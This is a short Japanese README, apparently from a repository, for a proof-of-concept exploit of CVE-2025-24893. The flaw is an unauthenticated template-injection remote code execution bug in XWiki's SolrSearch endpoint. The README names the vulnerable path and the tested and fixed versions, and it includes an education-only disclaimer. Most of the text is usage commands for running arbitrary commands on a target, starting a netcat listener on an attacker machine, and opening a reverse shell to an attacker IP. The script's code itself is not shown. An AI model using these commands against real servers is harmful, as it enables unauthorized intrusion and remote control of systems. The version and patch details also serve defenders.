
XWiki SolrSearch(CVE-2025-24893)の未認証RCE PoC。コマンド実行+リバースシェル。
XWiki SolrSearch 用の認証不要 RCE PoC (CVE-2025-24893)。コマンド実行 + リバースシェル。
XWiki SolrSearch テンプレートインジェクションによる認証不要のリモートコード実行を実証する概念実証です。
XWiki Debian 15.10.8 でテスト済み (15.10.11 / 16.4.1 / 16.5.0RC1 で修正)。
⚠️ 教育目的のみ。所有していない、または明示的な許可を得ていないシステムに対して実行しないでください。
/xwiki/bin/get/Main/SolrSearch 経由で送信します。pip install requests
スクリプト実行時にターゲットホスト (およびオプションのパス) を指定します。
基本的なコマンドを実行:
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"
リバースシェルを開始:
# On attacker box
nc -lvnp 4444
# From the PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444
/xwiki/bin/get/Main/SolrSearch?media=rss&text=...